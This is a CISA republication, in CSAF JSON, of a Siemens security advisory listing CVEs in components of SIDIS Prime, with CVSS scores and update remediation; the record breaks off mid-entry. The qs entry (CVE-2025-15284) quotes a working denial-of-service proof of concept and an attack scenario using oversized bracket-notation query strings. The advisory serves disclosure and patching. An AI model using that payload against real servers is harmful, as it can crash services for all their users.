| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-66030 | external |
| https://cwe.mitre.org/data/definitions/190.html | external |
| https://www.cve.org/CVERecord?id=CVE-2025-66031 | external |
| https://cwe.mitre.org/data/definitions/674.html | external |
| https://www.cve.org/CVERecord?id=CVE-2025-66035 | external |
| https://cwe.mitre.org/data/definitions/201.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-66412 | external |
| https://cwe.mitre.org/data/definitions/79.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2025-69277 | external |
| https://cwe.mitre.org/data/definitions/184.html | external |
| https://www.first.org/cvss/calculator/3.1#CVSS:3.… | external |
| https://www.cve.org/CVERecord?id=CVE-2026-22610 | external |
{
"document": {
"acknowledgments": [
{
"organization": "Siemens ProductCERT",
"summary": "reported these vulnerabilities to CISA."
}
],
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited",
"tlp": {
"label": "WHITE",
"url": "https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "SIDIS Prime before V4.0.800 is affected by multiple vulnerabilities in the components OpenSSL, SQLite, and several Node.js packages as described below.\n\nSiemens has released a new version of SIDIS Prime and recommends to update to the latest version.",
"title": "Summary"
},
{
"category": "general",
"text": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity",
"title": "General Recommendations"
},
{
"category": "general",
"text": "For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.",
"title": "Terms of Use"
},
{
"category": "legal_disclaimer",
"text": "This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy \u0026 Use policy (https://www.cisa.gov/privacy-policy).",
"title": "Legal Notice and Terms of Use"
},
{
"category": "other",
"text": "This ICSA is a verbatim republication of Siemens ProductCERT SSA-485750 from a direct conversion of the vendor\u0027s Common Security Advisory Framework (CSAF) advisory. This is republished to CISA\u0027s website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.",
"title": "Advisory Conversion Disclaimer"
},
{
"category": "other",
"text": "Critical Manufacturing",
"title": "Critical infrastructure sectors"
},
{
"category": "other",
"text": "Worldwide",
"title": "Countries/areas deployed"
},
{
"category": "other",
"text": "Germany",
"title": "Company headquarters location"
},
{
"category": "general",
"text": "CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Locate control system networks and remote devices behind firewalls and isolate them from business networks.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.",
"title": "Recommended Practices"
}
],
"publisher": {
"category": "other",
"contact_details": "central@cisa.dhs.gov",
"name": "CISA",
"namespace": "https://www.cisa.gov/"
},
"references": [
{
"category": "self",
"summary": "SSA-485750: Multiple Vulnerabilities in SIDIS Prime Before V4.0.800 - CSAF Version",
"url": "https://cert-portal.siemens.com/productcert/csaf/ssa-485750.json"
},
{
"category": "self",
"summary": "SSA-485750: Multiple Vulnerabilities in SIDIS Prime Before V4.0.800 - HTML Version",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-26-071-03 JSON",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2025/icsa-26-071-03.json"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-26-071-03 - Web Version",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-071-03"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-10-301-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/topics/industrial-control-systems"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/sites/default/files/publications/Cybersecurity_Best_Practices_for_Industrial_Control_Systems.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/news-events/news/targeted-cyber-intrusion-detection-and-mitigation-strategies-update-b"
}
],
"title": "Siemens SIDIS Prime",
"tracking": {
"current_release_date": "2026-03-12T06:00:00.000000Z",
"generator": {
"date": "2026-03-11T20:56:12.127996Z",
"engine": {
"name": "CISA CSAF Generator",
"version": "1.5.0"
}
},
"id": "ICSA-26-071-03",
"initial_release_date": "2026-03-10T00:00:00.000000Z",
"revision_history": [
{
"date": "2026-03-10T00:00:00.000000Z",
"legacy_version": "Initial",
"number": "1",
"summary": "Publication Date"
},
{
"date": "2026-03-12T06:00:00.000000Z",
"legacy_version": "CISA Republication",
"number": "2",
"summary": "Initial CISA Republication of Siemens ProductCERT SSA-485750 advisory"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:intdot/\u003c4.0.800",
"product": {
"name": "SIDIS Prime",
"product_id": "CSAFPID-0001"
}
}
],
"category": "product_name",
"name": "SIDIS Prime"
}
],
"category": "vendor",
"name": "Siemens"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-29857",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "summary",
"text": "An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/125.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2024-29857"
},
{
"cve": "CVE-2024-30171",
"cwe": {
"id": "CWE-203",
"name": "Observable Discrepancy"
},
"notes": [
{
"category": "summary",
"text": "An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/203.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2024-30171"
},
{
"cve": "CVE-2024-30172",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "summary",
"text": "An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2024-30172"
},
{
"cve": "CVE-2024-41996",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"notes": [
{
"category": "summary",
"text": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/295.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2024-41996"
},
{
"cve": "CVE-2025-6965",
"cwe": {
"id": "CWE-197",
"name": "Numeric Truncation Error"
},
"notes": [
{
"category": "summary",
"text": "There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. We recommend upgrading to version 3.50.2 or above.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/197.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-6965"
},
{
"cve": "CVE-2025-7783",
"cwe": {
"id": "CWE-330",
"name": "Use of Insufficiently Random Values"
},
"notes": [
{
"category": "summary",
"text": "Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution (HPP). This vulnerability is associated with program files lib/form_data.Js.\r\n\r\nThis issue affects form-data: \u003c 2.5.4, 3.0.0 - 3.0.3, 4.0.0 - 4.0.3.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/330.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-7783"
},
{
"cve": "CVE-2025-9230",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "summary",
"text": "An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-9230"
},
{
"cve": "CVE-2025-9232",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "summary",
"text": "Issue summary: An application using the OpenSSL HTTP client API functions may\ntrigger an out-of-bounds read if the \u0027no_proxy\u0027 environment variable is set and\nthe host portion of the authority component of the HTTP URL is an IPv6 address.\n\nImpact summary: An out-of-bounds read can trigger a crash which leads to\nDenial of Service for an application.\n\nThe OpenSSL HTTP client API functions can be used directly by applications\nbut they are also used by the OCSP client functions and CMP (Certificate\nManagement Protocol) client implementation in OpenSSL. However the URLs used\nby these implementations are unlikely to be controlled by an attacker.\n\nIn this vulnerable code the out of bounds read can only trigger a crash.\nFurthermore the vulnerability requires an attacker-controlled URL to be\npassed from an application to the OpenSSL function and the user has to have\na \u0027no_proxy\u0027 environment variable set. For the aforementioned reasons the\nissue was assessed as Low severity.\n\nThe vulnerable code was introduced in the following patch releases:\n3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.\n\nThe FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this\nissue, as the HTTP client implementation is outside the OpenSSL FIPS module\nboundary.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/125.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-9232"
},
{
"cve": "CVE-2025-9670",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "summary",
"text": "A security flaw has been discovered in mixmark-io turndown up to 7.2.1. This affects an unknown function of the file src/commonmark-rules.js. Performing manipulation results in inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9670"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/1333.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-9670"
},
{
"cve": "CVE-2025-12816",
"cwe": {
"id": "CWE-436",
"name": "Interpretation Conflict"
},
"notes": [
{
"category": "summary",
"text": "An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12816"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/436.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-12816"
},
{
"cve": "CVE-2025-15284",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "summary",
"text": "Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: \u003c 6.14.1.\n\n\nSummaryThe arrayLimit\u00a0option in qs does not enforce limits for bracket notation (a[]=1\u0026a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit\u00a0for DoS protection are vulnerable.\n\nDetailsThe arrayLimit\u00a0option only checks limits for indexed notation (a[0]=1\u0026a[1]=2) but completely bypasses it for bracket notation (a[]=1\u0026a[]=2).\n\nVulnerable code\u00a0(lib/parse.js:159-162):\n\nif (root === \u0027[]\u0027 \u0026\u0026 options.parseArrays) {\n obj = utils.combine([], leaf); // No arrayLimit check\n}\n\n\n\n\n\nWorking code\u00a0(lib/parse.js:175):\n\nelse if (index \u003c= options.arrayLimit) { // Limit checked here\n obj = [];\n obj[index] = leaf;\n}\n\n\n\n\n\nThe bracket notation handler at line 159 uses utils.combine([], leaf)\u00a0without validating against options.arrayLimit, while indexed notation at line 175 checks index \u003c= options.arrayLimit\u00a0before creating arrays.\n\nPoCTest 1 - Basic bypass:\n\nnpm install qs\n\n\n\n\n\nconst qs = require(\u0027qs\u0027);\nconst result = qs.parse(\u0027a[]=1\u0026a[]=2\u0026a[]=3\u0026a[]=4\u0026a[]=5\u0026a[]=6\u0027, { arrayLimit: 5 });\nconsole.log(result.a.length); // Output: 6 (should be max 5)\n\n\n\n\n\nTest 2 - DoS demonstration:\n\nconst qs = require(\u0027qs\u0027);\nconst attack = \u0027a[]=\u0027 + Array(10000).fill(\u0027x\u0027).join(\u0027\u0026a[]=\u0027);\nconst result = qs.parse(attack, { arrayLimit: 100 });\nconsole.log(result.a.length); // Output: 10000 (should be max 100)\n\n\n\n\n\nConfiguration:\n\n * arrayLimit: 5\u00a0(test 1) or arrayLimit: 100\u00a0(test 2)\n * Use bracket notation: a[]=value\u00a0(not indexed a[0]=value)\n\n\nImpactDenial of Service via memory exhaustion. Affects applications using qs.parse()\u00a0with user-controlled input and arrayLimit\u00a0for protection.\n\nAttack scenario:\n\n * Attacker sends HTTP request: GET /api/search?filters[]=x\u0026filters[]=x\u0026...\u0026filters[]=x\u00a0(100,000+ times)\n * Application parses with qs.parse(query, { arrayLimit: 100 })\n * qs ignores limit, parses all 100,000 elements into array\n * Server memory exhausted \u2192 application crashes or becomes unresponsive\n * Service unavailable for all users\nReal-world impact:\n\n * Single malicious request can crash server\n * No authentication required\n * Easy to automate and scale\n * Affects any endpoint parsing query strings with bracket notation",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-15284"
},
{
"cve": "CVE-2025-58751",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58751"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-58751"
},
{
"cve": "CVE-2025-58752",
"cwe": {
"id": "CWE-23",
"name": "Relative Path Traversal"
},
"notes": [
{
"category": "summary",
"text": "Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, any HTML files on the machine were served regardless of the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or server.host config option) and use `appType: \u0027spa\u0027` (default) or `appType: \u0027mpa\u0027` are affected. This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58752"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/23.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-58752"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "summary",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios starting in version 0.28.0 and prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/770.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-58754"
},
{
"cve": "CVE-2025-62522",
"cwe": {
"id": "CWE-22",
